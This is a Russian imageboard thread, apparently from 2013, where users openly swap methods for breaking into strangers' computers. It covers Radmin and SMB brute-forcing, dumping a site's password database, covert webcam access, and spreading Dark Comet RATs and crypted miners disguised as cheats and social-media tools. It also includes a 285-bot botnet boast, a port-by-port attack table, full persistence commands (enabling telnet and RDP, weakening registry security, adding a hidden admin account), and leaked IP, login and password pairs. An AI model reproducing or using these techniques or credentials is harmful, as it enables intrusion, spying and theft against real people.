bump
:37231
Ну что же вы?
совсем охуели чтоли? найти то, что на скриншоте - двух минут дело. уёбки блять.
В прошлом треде все YOBA-паки есть. Ищите.
Посоны нужен гондакл за радмин [email protected]
тему писать вк вк1 и тп
Сап /i/. Я, мудак, снова выхожу на связь.
Суть такова, есть комп с радмином, а на нем крутится сервак с сайтом и БД. Там есть регистрация и, соответственно, в базе лежат не меньше 80 логинов (соответствующих почтовому ящику) и паролей. Ящики эти очень пиздаты, ибо там регаются далеко не школьнеки.
И, как вы уже догадались, эту базу надо слить. НО проблема - сервер на венде, сайт на ASD.NET и MS SQL. Я их даже в глаза в жизне не видел и совсем не знаю как с этим работать.
Собственно реквестирую советов, как слить эту сраную базу и получить доступ к паролям.
А еще на этом сервере нашлось много других интересностей, но об этом позже.
>>45839 Сап мудак напиши мне на мыло [email protected] сервер посмотрю
>>45841 Что за саит? Определи директории там должна быть база
>>45842
Не, я пока туда лезть не буду. После 12 надо, как минимум.
Пока могу только посмотреть в слитые папки. Но что я там должен увидеть? Мало того, что я в этом нихуя не ебу, так там еще из за даунов-админов лежит просто уйма левого мусора, который засрал комп.
Сайт - какой-то регистратор тур-фирмы/отеля, со своей платежной системой. Насколько я смог понять.
>>45845
Ну охуеть теперь.
>>45848
Допустим, я их нашел. Как их расшифровать, если я имею полный доступ к рабочей машине?
Там должна быть панель админа... Они могут быть в мд5 или еще как нить с начало наиди потом поговрим
>>45850
> Там должна быть панель админа...
Найти бы ее еще.
Вот та самая база.
>>45858
умел бы я еще с ними работать...
Вот, методом тыка, удалось провести выборку и получить такую хуйню. Паролей пока нет.
В какую сторону копать?
Раскрываешь все колонки слева и смотришь все что связанно с логинами и паролями
Ты вообще в какой бд? Саита или просто у них валяется?
>>45863
Там их слишком дохуя.
Посмотри в Security в каждом и раскрой систем датабазе все
>>45867
> Security
Там вроде меняются логины/пароли пользователей базы.
> раскрой систем датабазе все
Там в конце всегда вот такие окошки вылазят.
Саит дай посмотрю мб взломаю инькцию проведу вытащю\выложу
Ищи в базах все что связано с пассами акками
>>45873
Блядь, я долбоеб, случайно отрубил этот сервак от интернета.
>>45875
Ну ладно, работа над этим откладывается не несколько дней. И тем не менее, есть еще один сервак, и на нем стоит радмин, НО я не имею к нему доступа, радмин не брутится по стандартным паролям.
Вбиваю айпи в браузер, он коннектится и выдает мне "Forbidden".
С ним уже ничего не сделать?
А от первого сервера, если что, остались скопированными все данные с диска.
Вот за это я и не люблю Шindoшs.
>>45652
и снова котосибирск
http://anonymousdelivers.us/58495
Анон, можешь запилить гайд? Я слишком поздно образумился и решил почитать тред. Прочитал прошлый, ничего конкретного не увидел, только личинки.
Сейчас (уже давно тащем) как йоба-кулхацкир сканирую сетку на открытые самба-шары и ftp. Надо бы продвинуться уже.
на фейкопочту можно, если чо [email protected]
>>45985
Алсо, сканер радмина перестает перебирать пароли через какое-то время (61% встроенного словаря проходит). Это защита от брута у радмина, или баг?
>>45987
Защита радмина от брута. На 2.0 как правило отключена, в остальных случаях придётся ждать разбана или сменить ЫП.
>>45996
Кстати, нет каких-нибудь поточнее данных по 2.1 и 2.2, на сколько банят через сколько попыток?
Объясните ньюфагу, как юзать радмин По царски чтоб
инб4 Уебывай
>>46002
прямо nmapом и брутить.
vova - это из какого словаря?
>>46008
Подробнее гуглить smb-brute.nse, да. Ебать тебе повезло с этим vova в начале словаря. Вообще-то, это анон троллил, длинными словарями радмин сканить не эффективно.
>>46009
> гуглить smb-brute.nse, да
Спасибо.
Ладно, оставлю стандартный словарь сканера.
Энивей, неинтересный этот радмин. Вот самба=>rdp охуенно.
Скачал быстрый only-самба-сканер.
>>46010
>быстрый only-самба-сканер
keimpx штоле?
Асло, что такое самба=>rdp? Как-то rdp включаешь psexec-ом?
>>46011
> keimpx штоле?
Лол, нет, просто поиск открытых шар.
> Как-то rdp включаешь psexec-ом?
Нет, rdp и так часто включено, но пробиться никак. А если сбрутить самбу, то и по рдп залогиниться можно.
Просмотрел предыдущие треда, и не нашёл ссылку на пак.
Киньте, а.
>2013
>radmin
двач никогда не стареет я смотрю
я вам покушать принёс
2ch.hk/i/res/44238.html#44356
Аноны, был пак в котором можно было сделать файл который назывался strangelove.cmd
Еще те самые радмин треды
Мне нужен именно этот пак а я его проебал ибо на многих компьютерах моих друзей тян сейчас стоит stranelove.cmd этот
>>46024
Что сейчас используют для спрединга те, кто угорают по молодости и хардкору?
>>46046
snowball+Dark Comet c приватным криптером.
>>46041
http://rghost.ru/private/47347288/95fca73fbf2cea385252a15eb93801ab
pas:123
>>46049
Кстати, если ты тот анон, который покупал на buycrypter, поясни пару вещей. Они там при покупке хотят имя покупателя - они это серьёзно, вообще? И, оно под виртуалками со своей привязкой к железу работает ли?
Поясните ньюфагу, чем сканировать? lamescan ? А то бегло прошлый тред скроллил, там говорят этим не сканировать.
>>46184
Откуда вы массив адресов берёте? На разных сайтах разные адреса даются?
>>45652
Нашёл ноут с только что установленной осью. Как включить его вебку, чтоб посмотреть, есть ли хозяин?
При установке webcamhack на комп жертвы выдаёт телнет ошибку, что "команда netsh advfirewall устарела бла-бла-бла". Простая замена на netsh advfirewall firewall не помогает, неверный синтаксис. Какая там команда должна быть прописана?
Вроде команду поменял, а всё равно не коннектится. Хотя на этот раз всё установилось правильно.
>>46196
Блять, я идиот. Только понял, что у некоторых может и не быть вебки.
>>46193
Так это пакет для линукса? Как назло, ни одного дистра под рукой нет. Если кто-то может дать адреса по Беларуси, а ещё лучше конкретно по Брестской области не знаю, возможно ли их отфильтровать как-то, то доставьте, пожалуйста.
Как поменять обои, если за компом кто-то сидит? Сегодня напал на каких-то бухгалтерш и, судя по их работе с компьютером, там всё запущено. Хотел им нигру с толстым хуем на рабочий стол поставить, чтоб настроение поднять. Как минимум, до прихода админа созерцали бы, лол.
>>46201
>это пакет для линукса
Это не пакет, это название базы. Можешь взять в любом месте, где нагуглишь, в том числе, и в «пакетах для линукса».
Например, здесь http://dev.maxmind.com/geoip/
>>46206
>в том числе и в «пакетах для линукса»
Запятая лишняя, фикс.
Нарыл какого-то школьника. Фильм смотрит, сидит вконтактике. Как напакостить? Реквестирую вишню.
Учитесь
>>46236
Он, наверное, двигает пальцами как будто они уже у неё во влагалище.
Ничерта не могу найти, может скинет кто паролей для брута какой именно у вас, если получается залезать? Юзаю ламу.
Расскажите, как вы вообще это делаете? Как например находите рандомные блоки с диапазонами ip.
>>45839
Запускай SQl Studio
находи базу и делай на нужной таблице показать 1000 строк
дальше сохранеешь результаты в таблицу
Это все.
Олсо готов купить результат если есть что интересное.
>>46010
>быстрый only-самба-сканер
Анон, что за сканер? Неужели ntscan?
анон скинь пак из ОП-пикчи
>>46310
свистни в хуй
>>46311
сам нахаляву получил,теперб жлобишь.
полуркай кто такой жлоб
Посоны, какие оптимальные настройки для ламискана? У меня пикрелейтед.
>>46390
а у нас в квартире газ, а у вас ?
Анон я уже джва года ищу программу чтобы нормально разделить видеопоток. Все эти сплиткамы палятся ужасно, а мне лишь нужно чтобы одна камера во всех приложениях могла браться несколько раз. Есть что на примете, хотя бы в виде драйвера?
Ох нихуя себе. Еще что-то находите?
Скиньте словарики, пожалуйста. В благодарность могу скинуть SL пак со встроенным радмином еще с тех двачей, лол.
>>47341
Двачую просьбу. Есть контакт/ одноклассники каких то мудаков, могу отдать.
>>46034
Эбать эти паки я заливал хуй знает когда, приятно знать что они еще живы :3
>>46038
>2ch.hk/i/res/44238.html#44356
Опять-же я эти турбиношки постил, увы хомяк сдох.
А я так и не устроил ад и содомию, жаль.
>>46059
Сноубол я уже говорил как закидываю, склеиваю сфх архив с фейкопрограмкой которая якобы делает ништяки в соц-сетях, накручивает лайки и так далее. Маленькие пёзды хавают.
Для майнинга юзаю так-же склеиные трейнеры для ёба игр, большим спросом пользуеться кс:го.
Майню стабильно 1.5-2.5 LTC в день.
>>46062
И что тут такого? Ведь ты просто хочешь защитить свой софт от реверс инжиринга, ведь так?
>>47354
В данный момент в ботнете 285 хомячков.
>>47354
Защитить свой софт от реверс инжиниринга я охуенно могу темидой, спасибо. Я в смысле - ты им там что писал, John Doe? Прокатило? А то понять, прокатит ли, до оплаты там нельзя.
>>47358
Какая темида блеат?
Я тебе это говорю к тому что ты якобы софт покупаешь для защиты своего софта а не для КРИПТОВАНИЯ ВИРУСОВ.
Я писал свои данные, я же не наркотики какие-нибудь покупаю а легальный софт.
Там же написано что софт для:
Crypters can pack your file in a way that the actual bytes are not readable. People use a crypter to to protect a file that they release, from crackers and reverse engineering. Or make files that are detected for some reason fully undetectable (FUD). False positives can be defeated this way and your file will get protected with a polymorphic and strong encryption. Our products are all undetected / undetectable and we frequently update it to keep it like this. These updates are completely free and automatic. Our FUD crypters are the cheapest in price class on the market, yet with most reliability and Highest Quality.Сгущенки не было, брат жив.
С привязкой HWID через виртуалку не знаю будет ли работать. Возможно если снесёшь виртуалку придёться писать в техподдержку и просить заново прикручивать новый HWID.
Алсо совет по криптерам, их два типа, есть написанные на сях и есть написанные на vbnet.
Те которые написаны на vbnet покупать не стоит, так как если у хомяка не стоит .NET Framework фаил нихуя не запуститься. У криптеров на сях нет таких проблем они работают всегда. xProtect написан на сях. Алсо убогое гавно за 10$ с пожихненной лицензией либо забекдорено либо работает через жопу. Будьте бдительны, не покупайте гавно.
>>47359
Дианон лигивон же. Охуительная история про криптеры на дотнете, бро. Отсыпь. Они там что, байткод криптуют?
>>47361
хз, вот в сорсах покопайся.
http://ge.tt/6MIvinl/v/0?c
На счёт вбнета и с++ читал тхреад на эту тему, я не один такой, все об этом говорят. Вбнет крипторы стоят на много меньше, их гнобят и унижают.
Напримет Byte Crypter стоит где-то 50$ на жизненную лицензию, он как раз написан ва вбнет. Могу сразу сказать на собственном опыте что закриптованные ВИРУСЫ этим криптором шкваряться быстро. Техподдержка соответственно хромает, рефудят редковато. Ну и если у хомяка не стоит нет фреймворк то нихуя не будет работать.
>>47354
Что за пул? Не банят за такие характерные графики?
>>47383
http://pool-x.eu/
Этот пул кажеться для этого и предназначен.
аноны, есть у кого хомяки с ip от Ростелекома?
если есть в хорошем качестве без смс и регистрации, то даже заплатить готов, без базара
>>47388
нужны именно хомяки, на которых можно воткнуть прокси
>>47362
> На счёт вбнета и с++ читал тхреад на эту тему, я не один такой, все об этом говорят.
Тут дело даже не в яп, а в том, что порог вхождения в C и, тем более, asm для школоты, штампующей быдлокрипторы за $10, куда выше, чем vb или дельфи. Вот и получается, что человек, владеющий сями, напишет более годный продукт.
>>47391
Блеать, теперь на информатёше сначала рассказывают формат PE и инструкции x86, а только потом няшную штоле? Чем ты упорот?
>>47392
Так подкинет кто словарь логинов? Жалко чтоли, блять?
>>47392
Ты что, крипторов от школоты не видел? Из ресурсов распаковать pe модуль и вызвать createthread, либо дропнуть его на диск и запустить - никаких форматов и инструкций знать не надо и такого дерьмища навалом валяется. И написано на vb или дельфях в-основном.
>>47398
Ну не видел такого говна, да. А чем это круче rar/7z sfx?
>>47399
> Ну не видел такого говна, да.
Тебе повезло, а я когда искал исходники крипторов для изучения все время находил Form1.pas.
> А чем это круче rar/7z sfx?
Да это же новый приватный криптор от -==MegaCrypter1998==- обламывающий эвристику антивирусов SUPERAntiSpyware, MicroWorld-eScan и AhnLab-V3.
>>47401
В экс-совке популярен посцаль, как-то так получилось. Да и на дотнете можно хороший продукт сделать, меньше отвлекаться на всякую гуйню.
>>47404
> Да и на дотнете можно хороший продукт сделать, меньше отвлекаться на всякую гуйню.
Может не оказаться библиотеки у клиента.
>>47406
Ну не в готовый же PE байткод пихать. Байтоёбить на шарпе тоже удобней, чем на няшной, сюрприз. А себе-то хакир уж как-нибудь не обломается рантайм поставить.
Пагни, как там получить доступ к веб камере ?
Анон, запили паки с набегов же. Неужели вы за это время не собрали хоть какой-то годный, общий пак? И доставьте ссылку на ргхост с видео, где няша теребит свою писечку. На втором видео она еще с подругой стояла, которая ей заплетала волосы.
>>47424
И ты будешь охуенно один сам с собой тут семенить? Или ты уже?
>>47426
Вот именно папка WINDOWS меня интересует, где её можно достать?
Вы всё еще радмините? Как вы это делаете? Последние 2 года же вообще нихуя не находит.
>>47431
Серьёзно, каким хуем вы еще что-то находить умудряетесь?
Вообще было бы неплохо сборочку накатать, 7-ку или 8-ку, но с особыми ключами реестра, а именно:
1. LimitBlankPasswordUse = 0
Даёт залогиниться на хомяка через самбу, на юзвере с пустым пассом
2. LocalAccountTokenFilterPolicy = 1
Заставляет думать хомяка, будто он в домене, и тогда он позволит ходить по дискам c$, d$ через шару, а ещё даст PsExec-иться к компу, т.е. выполнять любые команды.
3. fDenyTSConnections = 0
Включит RDP на хомяке, чтобы наверняка
4. fSingleSessionPerUser = 0
Чтобы можно было по RDP зайти в юзверя параллельно, даже если он уже зашёл
Правда 3 и 4 пункт актуальны, если termsrv.dll пропатчен, но думаю и это не проблема. Можно патчить по PsExec.
Единственная проблема для такой сборки венды будет самая распространённая - NAT/Фраервол. Не знаю, что предложить для обхода его средствами венды.
>>47434
Открыть 445 через upnp? Блеать, где ты только собрался брать лохов, которые венду из магазина будут заменять на сборочку
>>47434
>обхода его средствами венды
Ну это вряд ли. Тор поставь, подключайся через скрытые сервисы. Это обойдёт NAT, а штандартный файрвол шпермёрки на исходящие подключения не агрится вроде бы.
где лучше форсить КЕЙГЕНЫ и прочие КРЯКИ с кометой ?
http://youtu.be/obxLiRwClks видос релейтед
Ну что, Анонимусы, леймскан еще кого-то находит?
И куда съебал СЛ-кун, все-таки?
Кстати, ремкам палиться стал, сука. Есть еще какая нибудь альтернатива со звуком?
Братишки, в прошлом треде один анон (этим аноном был >>44324) выкладывал свой илитный словарь, но теперь он с ргхоста удален. Запилите, у кого он остался, а?
>>47531
Говно его словарь был.
Валяется где-то на диске даже искать лень.
>>47537
Хотя ладно, так уж и быть http://rghost.ru/48729793
31.43.212.35 4899 123456789
>>47429
охуеть хороший человек людей взламывает и издевается над личной жизнью
>>47398
Memory Inject еще есть, только работает через жопу.
Было примерно год назад.
Подключаюсь к ПК а там всплывает окно с моим айпи.
Как не попадаться на такую хуйню? Использовать прокси?
Посоны, где эти ваши snowball и Dark Comet скачать? Какие вообще есть форумы хакерские? А то надоело уже на античате со школьниками сидеть. С меня няшки.
Господа, я ещё ремкам юзал и стех пор тут не был: чем сейчас анон пользуется?
И почему в треде нет вина? Для себя держите? Я в своё время вагон вконтактов раздал, ни одного не осталось, а некоторые годный видос пилили-скидывали.
кто её спиздил?
>>47877
Хуя тебе припекло. Летом ещё вышла замуж за какого-то омежного хуя и съебала с этой пекарни.
>>47878
о она где?
>>47353
Если это и вправду твоих рук дело, то даю тебе подсказку... Интернеты туда доставляется через МТС staticip... логин и пароль они не меняли... они подумали что у них чтото сломалось и тупо сделали рекавери из образа акрониса.
>>47892
И ещё... доставь пожалуйста айпишник в студию... я залезу проверить как у них там дела. Просто у меня нет их адреса в списке моём.
скиньте вк
на
[email protected]
Я просто оставлю это здесь.
2ch ru. net/b/res/443986.html
>>48048
>2ch ru. net/b/res/443986.html
>/b/
Схорони потом, ок? Хотя оно, наверное, медленное до жути.
Давно не заходил, помню раньше ыли всякие радмин йоба паки, сейчас погуглил на рыгыхосте, нашло какую то подозрительную хуйню. Куда всё пропало?
чья личинка rmp.exe ?
пакует фоточки в 1025 в sytem32
>>46004
>прямо nmapом и брутить.
анус себе nmap'ом сбруть, пёс!
>>48502
Она на каждую попытку новое соединение открывает, нахуй так жить. smb-brute.nse поумнее.
Бамп негодному треду.
Блять, уже как 3часа ебаный lamescan ищет и вообще нихуя не находит.Сижу на бабунте, lamescan под вайном.
ЧТЯДНТ?
>>50698
жуёбок, ему nmap дали, скань - не хочу, хочу жрать говно.
>>50700
Иди нахуй отсюда, понимаешь?
>>50701
Нефть зарание.
>Иди нахуй отсюда, понимаешь?
Ты какой то агрессивный. Nahui_tak_zhit.jpg
>>50702
Бро, возьми да читни мануалы от vazoneza вованов, сирисли. Какая разница между тем, что тебе напишут в /i или всякими хакир-ферумами о nmap?
Народ,не подскажите прогу, которая при запуске запоминает все пароли которые были введены с компа и позволяет записать их в текстовой файл. Если поможете то скину интересную парочку с их видео.
>>50781
Ты СОВЕРШЕННО не понимаешь в чем суть /i/. /i/ это не хакер.ру «о, привет чуваки, зацените мой новый винлокер, гыгы». /i/ это не псевдоинтеллектуальные обсуждения на античате. /i/ это не rdot, хакзона или эксплоит-ин. /i/ это место, где люди могут побыть ваннаби-хакерами — ужасными, бесчувственными, безразличными ваннаби-хакерами, которыми они на самом деле и являются.
>>50781
"кейлоггер" гугли. хочешь- сам пиши, хочешь- качай готовые. етого говна полно
>>50783
Возможно путаю но, разве кейлогеры не запоминают только то что ты вводишь сам ручками?
>>50785
Мне нужна прога запоминающая уже все введеные пароли и логины. Недавно такую у хомяка украинского стащил да по дурости по херил. Теперь ищу.
Посоны, у меня хомяк умер. Буквально. Пользовался его аккаунтом, чтобы фапать на милф в "Одноклассниках".
>>50790
Меняй пароль, можно охуенно потралить милф с того света.
>>50788
Самое смешное это был мент и прога была для запоминания паролей, ему походу на работе такую выдали как я понял.
>>50793
Мне совесть не позволит. Забирайте.
login kvv_max.mail.ru
password 80297391199
>>50790
Лол.
скиньте маленький словарик с эффективностью выше, чем никакой. спасибо
и кстати, как радмин работает с роутерами?
>>50863
Не работает. Если только порты перебрасывать, для этого нужен доступ к роутеру.
>>47354
Друже, а можешь поделиться этой фейкопрогой. Ясен фиг, написать подобное не трудно, но лень. с меня тоже что-нибудь в благодарность. Могу так же скинуть логины и пассы от пятка страничек лолей втентакле
Няши, поделитесь консольной версией lamescan-а.
>>51804
Я поехал и решил упороться радмином.
За 5 часов насканил 43 хоста, пароли тольк вот набрутить не могу, да.
Альсо, может ещё кто-то упарывает? Или уже поздно и всё уже набрутили и забили хуй?
>>51809
Года два уже как поздно. ipv4 адреса закончились, всех мелкопровайдеров скупил крупняк и засунул под нат, да и зверьсиди с шиндоус XP уже в последнем сельпо выкинули. Ну и сранжлов спиздил последних хомяков, по традиции.
бамп
Посоны, как выключить вероятные дыры в системе? Windows 7 с сервис-паком.
>>51876
> выключить вероятные дыры
Ты сам хоть понял, что спросил? Я тебя не совсем понимаю, можно избавиться от известных дыр, а вероятные ты как закроешь, если о них не известно?
>>51879
Да нет, вопрос хороший. От вероятных, т.е. еще неизвестных дыр может хоть частично защитить антивирус, фаервол, подключение не напрямую а через роутер (чтоб не голой жопой в интернет).
>>51813
А в чем проблема делать свои сборки? Ждешь популярного релиза какой-нибудь игры или программы, делаешь СБОРКУ ОТ R.G. MEHANIKS с радмином и крысой внутри и раздаешь.
>>51797
http://rghost.ru/57104152
тут всё, гуи и консольная + документация и описание протокола
непосильным трудом выгуглено по частям, так что не потеряйте!
>>45652
Посоны, как зарадминить комп если знаешь ip?
>>52019
Сначала:
1. Просканировать порты, глянуть возможные векторы атаки
2. Ты должен хотя бы немного знать, что на каком порту обычно висит
3. Ниже наиболее частые варианты
Цель -> Способ
Linux/Unix -> */tcp -> Metasploit Autopwn | гуглить
Windows -> 21/tcp -> Metasploit Autopwn | гуглить
Windows -> 23/tcp -> MS08-067
Windows -> 80/tcp -> Metasploit Autopwn | гуглить
Windows -> 139/tcp | 445/tcp -> MS08-067
Windows -> 139/tcp | 445/tcp -> NTScan
Windows -> 3389/tcp | 3390/tcp -> DUBrute | подобрать ручками
Windows -> 4899/tcp -> Lamescan
Windows -> 5900/tcp -> VNC bypass | VNCrack
Неизвестно -> Nmap -> Думать
Неизвестно -> HScan GUI -> Ждать гудов
Неизвестно -> Metasploit -> Autopwn
Роутер -> Hydra | Bruter | Router Scan -> DNS Spoof | VPN в локалку | дамп PCAP
Коротко и ясно - находить все возможные тулзы для атаки на нужный порт и врубаешь всю эту артиллерию. Лучше конечно по очереди, а не одновременно.
>>52020
>Windows -> 23/tcp -> MS08-067
быстрофикс... Telnet конечно же, и Metasploit Autopwn
>>52020
Большое спасибо. Добра тебя и няшу под пледик.
Как запустить "тихую установку" radmin? Имеется скомпилированный msi файл. Так же имеется передача файлов и telnet через официальный radmin, который заканчивается через 4 дня.
SL-пак не предлагать. У жертвы windows 8, и radmin 3.5, на которой его хуйня не запускается.
>>52029
Чтоб не потерять контроль после как радмин сдохнет, сделай себе:
1. Telnet
dism /online /Enable-Feature /FeatureName:TelnetServer
sc config SecLogon start= demand
sc config TlntSvr start= auto
sc start TlntSvr
2. Самбу (лазить по файлам, дискам, управлять службами)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v ForceGuest /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f
3. RDP
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
sc config termservice start= auto
sc start termservice
netsh firewall set service type = remotedesktop mode = enable
4. Юзверя
net user 2ch3r 2hk-i123 /add
net localgroup Пользователи 2ch3r /delete
net localgroup Администраторы 2ch3r /add
net localgroup TelnetClients 2ch3r /add
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 2ch3r /t REG_DWORD /d 0 /f
После проделанных нехитрых манипуляций тебе будет сложнее потерять контроль над жертвой.
А уже после можешь думать, как старый радмин туда запилить. Кстати, RAdmin v2.x видит чёрный экран начиная с Vista.
Аноны сделайте гаид по запилу на пекарню впн сервера жерты
>>52095
Ты хотел сказать «по запилу на пекарню жертвы впн-сервера»?
Openvpn ставь и настраивай, свой ГАЙД выбирай из любой статьи:
http://habrahabr.ru/post/107631/
http://habrahabr.ru/post/157547/
http://habrahabr.ru/post/153855/
Имеет смысл только в случае, если у жертвы анонсированный (aka белый/внешний) IP-адрес или если ты находишься с ней в одной локальной сети.
>>51958
В том, что за роутерами все, ебантяй. Радмин в через них не может.
реквестирую годный словарь из прошлого треда
>>47355
Как у тебя все по полочкам розложенно, запили по хардкору как ты все это зделал.
Прошлый тред >>44238 уходит в бамплимит, продолжаем здесь.